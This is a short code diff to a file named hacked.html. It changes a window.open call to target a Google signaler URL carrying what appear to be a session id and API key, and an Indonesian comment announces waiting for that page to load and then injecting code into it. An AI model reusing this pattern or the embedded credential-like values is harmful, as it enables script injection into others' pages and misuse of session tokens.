--- a/hacked.html
+++ b/hacked.html
@@ -40,7 +40,7 @@
     `;
 
     function openWeb2() {
-      const win = window.open("https://lanaya113505.github.io/pizza/hacked.html", "_blank");
+      const win = window.open("https://prod-dynamite-prod-09-us-signaler-pa.clients6.google.com/punctual/multi-watch/channel?VER=8&gsessionid=i9Bs3AwFzHO6Yd-9otOqRNhwzSkUNdIixKEywrcd9Wo&key=AIzaSyB0RaagJhe9JF2mKDpMml645yslHfLI8iA&RID=62906&CVER=22&zx=hj61wnku2mml&t=1", "_blank");
 
       // Nunggu sampai Web 2 load, baru inject kode
       const interval = setInterval(() => {
